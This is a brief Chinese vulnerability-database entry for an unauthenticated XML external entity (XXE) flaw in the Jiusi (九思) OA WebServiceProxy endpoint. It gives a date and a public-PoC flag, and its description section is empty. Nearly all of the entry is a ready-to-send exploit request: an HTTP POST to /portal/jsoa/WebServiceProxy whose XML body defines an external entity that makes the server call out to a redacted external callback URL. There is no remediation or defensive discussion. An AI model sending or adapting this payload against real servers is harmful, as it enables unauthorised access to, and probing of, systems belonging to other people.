九思 OA WebServiceProxy 未授权 外部实体注入漏洞

日期: 2024-08-22 | 影响软件: 九思OA WebServiceProxy | POC: 已公开

漏洞描述

PoC代码

POST /portal/jsoa/WebServiceProxy HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 139
Referer: http://[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE aaa [<!ENTITY name SYSTEM "http://[REDACTED]/i/904437/3g4z/a3yv/" >]><name>&name;</name>